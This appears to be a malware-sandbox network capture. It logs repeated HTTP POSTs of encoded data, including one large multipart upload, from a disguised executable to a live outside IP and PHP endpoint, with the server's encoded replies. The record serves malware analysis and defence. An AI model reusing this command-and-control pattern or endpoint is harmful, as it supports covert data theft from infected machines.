Dec 10, 2024 07:33:31.119868040 CET	134	IN	Data Raw: 73 5d 08 56 6f 6b 55 79 5e 5e 51 7d 77 76 41 7b 43 67 44 7b 4f 78 42 78 58 56 5f 51 00 74 4b 55 63 54 48 56 5b 00 46 52 04 00 5f 58 6f 62 09 6e 72 65 5a 77 5b 78 46 7d 48 60 42 7d 76 79 40 77 75 7b 40 7b 5b 54 59 50 00 71 4a 52 65 5d 48 51 5b 0b Data Ascii: s]VokUy^^Q}wvA{CgD{OxBxXV_QtKUcTHV[FR_XobnreZw[xF}H`B}vy@wu{@{[TYPqJRe]HQ[YaZ\XEkfzySsMjkxCatSy\WiTsF]Ph0
Dec 10, 2024 07:33:31.182100058 CET	268	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 384 Expect: 100-continue
Dec 10, 2024 07:33:31.584757090 CET	384	OUT	Data Raw: 50 58 5f 5f 50 46 56 50 5c 58 5b 56 51 58 56 55 59 5c 5e 44 56 5c 54 52 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PX__PFVP\X[VQXVUY\^DV\TR[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU X<"]".S="%,+4:8<8=!-#![,+@%>&.5'Z!.[)
Dec 10, 2024 07:33:31.619940042 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:32.037590027 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 55 28 35 37 0e 36 5a 31 54 2f 10 3f 0d 24 08 24 06 28 3e 3e 5e 26 2a 2c 59 2b 00 27 11 21 17 29 07 3c 3a 2b 13 3c 2f 03 53 28 13 2b 46 0c 1b 21 5a 35 05 0c 55 24 15 2a 57 2c 3e 34 04 29 2e 2a 14 21 3c 03 1c 24 12 24 00 22 3d 06 0b 28 2a 30 5a 27 2e 3c 02 28 55 39 0f 22 2b 23 56 03 1f 25 1d 3f 11 35 0f 30 06 32 54 31 06 0d 5a 30 38 2f 58 2a 39 2e 18 33 00 25 05 24 16 24 1c 2b 22 39 5f 27 2f 24 5d 28 5b 26 57 27 09 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%U(576Z1T/?$$(>>^&,Y+'!)<:+</S(+F!Z5U$W,>4).!<$$"=(0Z'.<(U9"+#V%?502T1Z08/X9.3%$$+"9_'/$]([&W'#S U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49805	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:32.387058973 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49806	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:32.425309896 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:32.776596069 CET	2116	OUT	Data Raw: 55 5a 5f 53 55 44 56 56 5c 58 5b 56 51 5f 56 52 59 51 5e 48 56 5b 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UZ_SUDVV\X[VQ_VRYQ^HV[TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#)31 >.>&>&<4!* [?;5["#!<.'E'>);'Z!.[)<
Dec 10, 2024 07:33:33.752310991 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:33.987456083 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 26 0a 28 36 02 55 22 3c 21 55 3b 00 2c 1e 27 1f 06 08 2b 58 32 59 26 2a 24 5f 2b 29 3f 5c 21 39 00 5c 3f 29 23 5e 3f 06 32 0e 28 13 2b 46 0c 1b 22 00 36 38 32 57 24 28 32 1f 2d 03 2f 59 28 3d 08 5f 23 2f 22 0d 33 12 20 02 37 2d 28 0e 3c 17 01 03 26 3d 0d 59 3c 33 03 0d 22 2b 23 56 03 1f 25 1e 28 3c 26 50 33 2f 0c 55 31 16 02 00 33 16 0d 58 2a 17 26 18 24 2e 0f 01 33 28 24 50 3f 0f 29 58 26 11 34 5a 2b 2e 22 56 27 23 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&(6U"<!U;,'+X2Y&$_+)?\!9\?)#^?2(+F"682W$(2-/Y(=_#/"3 7-(<&=Y<3"+#V%(<&P3/U13X&$.3($P?)X&4Z+."V'##S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49810	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:32.769232035 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:33.120173931 CET	2536	OUT	Data Raw: 55 5c 5f 5f 55 4b 53 52 5c 58 5b 56 51 5b 56 53 59 50 5e 44 56 5b 54 53 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U\__UKSR\X[VQ[VSYP^DV[TS[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU \( :5>R>S=24]4*?+(.]"-! +.8?'-),'Z!.[),
Dec 10, 2024 07:33:34.096235991 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:34.335700989 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49816	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:34.596024990 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:34.949016094 CET	2536	OUT	Data Raw: 55 50 5a 53 55 45 56 5c 5c 58 5b 56 51 5e 56 55 59 50 5e 46 56 5a 54 5e 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UPZSUEV\\X[VQ^VUYP^FVZT^[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#+._">W*:X2< Z+;-5=4Y9+E$.;'Z!.[)8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49819	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:35.810344934 CET	339	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----Q1J0NfdoMZej8QTisOXN8vSeFSV5WpnDOS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 112814 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:36.167121887 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 51 31 4a 30 4e 66 64 6f 4d 5a 65 6a 38 51 54 69 73 4f 58 4e 38 76 53 65 46 53 56 35 57 70 6e 44 4f 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------Q1J0NfdoMZej8QTisOXN8vSeFSV5WpnDOSContent-Disposition: form-data; name="0"Content-Type: text/plainP\_SP@V\\X[VQRVVYT^@VXT\[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_
Dec 10, 2024 07:33:36.286566019 CET	2472	OUT	Data Raw: 31 46 4b 62 6e 36 6c 67 4c 59 2f 71 79 4d 41 44 38 63 38 39 44 51 6c 53 65 6d 4c 48 32 43 7a 61 63 34 6e 32 6b 6f 36 47 4b 78 49 79 72 6b 4b 50 65 2f 65 76 79 77 4c 58 74 39 38 44 68 32 35 38 4c 2f 71 46 75 6d 4e 32 55 56 59 2f 59 5a 37 45 45 69 Data Ascii: 1FKbn6lgLY/qyMAD8c89DQlSemLH2Czac4n2ko6GKxIyrkKPe/evywLXt98Dh258L/qFumN2UVY/YZ7EEi4dhZRXqi9qYglBEhcpEtvyJkglTKlBiU0hHi7hjMwQU1kooUtE5gwETTSlQvz7L2cBLb7E5R8LoRMRUU4ckoUW4P7zZFLcnPo4ZsgvarRZKfQlRTZHgEqdLi38NpRQmNk9bKAD5ZyEYWDWNBTe0nsGkrqMBAz/xoy
Dec 10, 2024 07:33:36.286609888 CET	2472	OUT	Data Raw: 59 32 32 44 55 33 50 44 51 4f 32 4c 52 64 4c 42 74 37 65 4b 2b 4a 5a 38 41 62 77 61 43 4a 50 64 47 67 54 70 4a 55 6f 63 30 41 30 48 68 56 4f 7a 70 41 5a 75 46 31 57 49 75 6e 4f 69 6a 71 46 72 78 45 68 4e 42 74 30 71 53 48 46 79 78 4b 4d 51 71 4d Data Ascii: Y22DU3PDQO2LRdLBt7eK+JZ8AbwaCJPdGgTpJUoc0A0HhVOzpAZuF1WIunOijqFrxEhNBt0qSHFyxKMQqMYcKmF+PPx0zrBB/3k4E7PgFmELBHgcDKNsSrVVVMH3s4A6gcCHgXJNjamZkLQyBH4LzFupjKmZkbQaKdf2e/k/BodJuhHhZCCEQBLZzzGCoJzSBIhiJYgf39hazw9IuYV2D/NYnCNhOlq2n7gZhm6ETGRONPxUsMX
Dec 10, 2024 07:33:36.286642075 CET	2472	OUT	Data Raw: 65 64 6d 50 6c 65 39 4b 58 43 49 4b 52 53 47 58 4c 64 52 74 35 2f 68 4e 6c 48 59 31 7a 47 79 6e 44 43 30 62 31 69 42 73 46 31 41 53 6c 61 4d 49 52 6e 72 6a 63 41 75 4e 30 39 6a 33 62 53 2f 49 77 49 51 6f 47 52 68 43 68 4a 6a 6e 72 78 56 4f 59 45 Data Ascii: edmPle9KXCIKRSGXLdRt5/hNlHY1zGynDC0b1iBsF1ASlaMIRnrjcAuN09j3bS/IwIQoGRhChJjnrxVOYEfnq078IlxsrdpQvY2DVjVpKFEUFuOWdNT3DellgR22FBCHkJuT/8eN/aNdkkNI+/sD0lkSvxhRI3MV+4676vF2EcfX5Ww9/xsSsPeadOZiRl21m7w/XPmP71k2/JmUwt8p/PLiFtvqfsCBS7MJ9/JkW/SzEjsM+9e
Dec 10, 2024 07:33:36.286870003 CET	9888	OUT	Data Raw: 74 4e 4f 47 73 6a 35 65 44 5a 30 4f 49 47 33 46 37 35 4c 4f 78 69 65 52 41 63 31 76 64 71 51 6a 4d 56 44 6e 32 46 75 32 6c 65 65 7a 42 59 55 76 53 33 69 4a 74 44 49 41 44 79 35 6c 38 44 79 6d 7a 55 6c 55 39 6a 55 79 62 34 6d 33 34 7a 71 72 38 6c Data Ascii: tNOGsj5eDZ0OIG3F75LOxieRAc1vdqQjMVDn2Fu2leezBYUvS3iJtDIADy5l8DymzUlU9jUyb4m34zqr8l60ISl63mbG/QN/gQxX6YWatugZnuBb0uzBm/M64wPchky5RVyK/GkVTJVp4tVl4o0NZdddcYPLY8/QUZIaEsm1gSkYDWk5RnH9Z9lTrsydZ7SgXDDJW3EJzyC9u2ZGDgKiMzO/xh4WJn3SFcj88fBbow8910rswdB
Dec 10, 2024 07:33:36.286983013 CET	4944	OUT	Data Raw: 73 6e 70 4b 35 30 36 6c 61 78 6d 55 74 73 71 6a 34 57 6b 6b 76 50 36 58 4d 31 79 41 4c 73 57 63 4d 74 50 35 59 53 59 69 6a 6b 67 74 30 39 78 46 73 54 47 32 58 51 51 55 4c 4e 70 50 6e 39 4b 74 30 79 62 47 47 63 66 76 79 4a 79 59 73 55 75 75 2b 4f Data Ascii: snpK506laxmUtsqj4WkkvP6XM1yALsWcMtP5YSYijkgt09xFsTG2XQQULNpPn9Kt0ybGGcfvyJyYsUuu+O2xorEBcHjgwZxIbI4kbmTgSCa0UV34JR3uyK96wRsZRFIbPyYVwsdFuLCB78iB8NElyRDTfWkFFpQncSFYiLgM0bWNXVDRgsgRiIbjKuq38QA6u1SwWqz55zPMrCidkOnbRW1tIYIjiiB0xGeCGX02qcvuDcekV7k
Dec 10, 2024 07:33:36.287014008 CET	2472	OUT	Data Raw: 69 68 79 49 59 67 47 4c 53 51 61 43 44 36 46 34 6c 4c 2f 6a 72 51 76 72 57 66 46 68 72 6c 70 65 41 41 76 56 78 47 72 70 77 51 58 62 72 67 70 6d 30 42 4a 5a 50 57 45 67 57 37 56 4e 78 63 48 67 49 30 48 68 43 38 6f 73 57 7a 6b 49 78 69 51 52 65 41 Data Ascii: ihyIYgGLSQaCD6F4lL/jrQvrWfFhrlpeAAvVxGrpwQXbrgpm0BJZPWEgW7VNxcHgI0HhC8osWzkIxiQReA1+izA1kazUvgFNJHDmohk2Muxcya5qNjptAk5GzC0bGbueBMYkNBTKD4NjXX+iWI2Yx/Q7EI2Z+A3yHRNbOx7oD18ftjCUvk34glq9LDQk6KVyNtbCARhy2stakhcmcG46V1AcglRwLGSLQM/ppKzUyrPTjzFzvQE
Dec 10, 2024 07:33:36.406060934 CET	4944	OUT	Data Raw: 45 55 2b 49 4e 4b 42 4e 31 47 4c 31 6c 54 67 58 76 2f 34 4d 47 70 57 63 75 79 35 46 48 4c 47 51 75 35 43 70 63 65 35 6e 73 46 57 52 79 33 76 2f 35 57 62 7a 78 55 68 30 62 32 46 69 63 4f 39 35 79 50 54 5a 31 42 33 67 42 75 57 47 71 53 62 6e 75 61 Data Ascii: EU+INKBN1GL1lTgXv/4MGpWcuy5FHLGQu5Cpce5nsFWRy3v/5WbzxUh0b2FicO95yPTZ1B3gBuWGqSbnuatWRT+Lq0a1Z4q/FKf7xIAklRdUchl/q28sirgg30JM5SwUe2WKadlldtdX8T+5xm1LidqiwMy/qTExKz6mnubfvHQU8Enl2AZFUcFkiX1a1P98ZEf7tUD/2c2aBLMroYEwsFALukspQAhmqRydhGI1u8tP4WIUahY
Dec 10, 2024 07:33:36.406095982 CET	2472	OUT	Data Raw: 2f 6f 33 73 6d 4a 4b 61 6c 34 58 46 71 4b 46 52 4d 75 66 77 6f 6e 4d 52 53 66 52 58 71 72 47 42 56 78 52 2f 78 63 73 4b 4f 45 54 42 30 31 67 6c 35 73 62 76 42 74 73 41 30 64 2f 4f 71 46 6c 47 68 6c 66 44 47 6a 4a 47 31 57 7a 33 35 78 69 37 2b 52 Data Ascii: /o3smJKal4XFqKFRMufwonMRSfRXqrGBVxR/xcsKOETB01gl5sbvBtsA0d/OqFlGhlfDGjJG1Wz35xi7+RWJra7vIoS3lJ4oLXwoemIWsdm2Zy0Xrx9Rif5h9/3yOZo3KFP+9hsiixpsHhxxmTzNu9Pvmx2HlyS7vwyfk1wsjxJ5EGqzpmzh0vnlTyzSe0fjg2T23i7mjX5O3M0kDUKJ5fIBejdBe+TyN9H918kaE2Oakqk/dpe
Dec 10, 2024 07:33:36.406130075 CET	2472	OUT	Data Raw: 37 70 59 49 33 41 39 59 32 71 64 73 65 42 76 6d 32 38 38 38 41 76 50 4f 42 75 75 71 62 66 2b 4d 70 76 6f 71 58 42 6e 48 6a 7a 5a 65 31 46 51 42 4e 79 47 48 42 59 36 41 50 64 5a 51 2f 52 45 73 4c 52 54 34 43 30 48 52 6b 74 68 53 43 65 4a 51 57 4a Data Ascii: 7pYI3A9Y2qdseBvm2888AvPOBuuqbf+MpvoqXBnHjzZe1FQBNyGHBY6APdZQ/REsLRT4C0HRkthSCeJQWJ+G0mlVx33YGYhMdKBjbqAZUrZP6fixSewtpVM3smKkc3ogYk46jmT37LRYyCmzxyFG7d++kZmuvEtJr6EbGKht9eT64vj25sdDyKuBgMorpdaTkWTq7JHbRoJYCSzRXPBSnv1upfzdF763szfyNztF7kN0dQLiuNt
Dec 10, 2024 07:33:37.146264076 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:37.757009029 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49820	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:35.949152946 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:36.307502031 CET	2536	OUT	Data Raw: 55 5b 5f 54 50 41 56 55 5c 58 5b 56 51 52 56 54 59 5c 5e 40 56 5e 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U[_TPAVU\X[VQRVTY\^@V^TY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ^?".:=&)10]#$_((.6-X ,-+D0>9X.5'Z!.[)
Dec 10, 2024 07:33:37.281512022 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:37.515429974 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49827	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:37.756464005 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:38.104361057 CET	2536	OUT	Data Raw: 55 58 5a 53 55 43 53 52 5c 58 5b 56 51 5c 56 5e 59 52 5e 44 56 59 54 5a 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UXZSUCSR\X[VQ\V^YR^DVYTZ[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ?3-5*6"'<4]7:'+8-")_#W79;<0!/5'Z!.[)0
Dec 10, 2024 07:33:39.092451096 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:39.327392101 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49833	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:39.197886944 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue
Dec 10, 2024 07:33:39.541986942 CET	2116	OUT	Data Raw: 50 5d 5a 53 50 44 56 57 5c 58 5b 56 51 52 56 56 59 56 5e 42 56 58 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P]ZSPDVW\X[VQRVVYV^BVXT[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU Y(0-"-"=5&/344?"-^4198'3=:/%'Z!.[)
Dec 10, 2024 07:33:40.537492990 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:40.771573067 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 54 28 36 30 50 22 2c 29 55 38 2e 06 55 24 57 27 18 2a 3e 26 13 32 04 0e 5d 3f 00 3f 11 22 39 36 18 2b 3a 24 07 28 3c 39 18 2a 29 2b 46 0c 1b 22 02 22 05 32 56 25 28 3e 1f 2d 04 2b 1e 3d 3d 3a 14 36 02 3d 1e 24 2c 28 05 34 04 33 1a 3f 29 24 5b 31 5b 3b 1e 2b 1d 00 52 20 11 23 56 03 1f 25 51 2b 3f 26 19 26 2f 0f 0f 31 06 09 58 25 28 09 10 29 3a 26 1b 33 3e 00 5e 27 16 3c 1d 3f 31 0f 5f 25 01 2b 03 3f 3e 3e 57 25 33 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%T(60P",)U8.U$W'>&2]??"96+:$(<9)+F""2V%(>-+==:6=$,(43?)$[1[;+R #V%Q+?&&/1X%():&3>^'<?1_%+?>>W%3#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49834	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:39.588804960 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:39.948168993 CET	2536	OUT	Data Raw: 55 50 5a 52 55 46 53 52 5c 58 5b 56 51 58 56 54 59 5c 5e 40 56 59 54 5a 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UPZRUFSR\X[VQXVTY\^@VYTZ[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#+2Z6>\2/+ <\?:_!.= -80>].%'Z!.[)
Dec 10, 2024 07:33:40.915719032 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:41.153371096 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49840	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
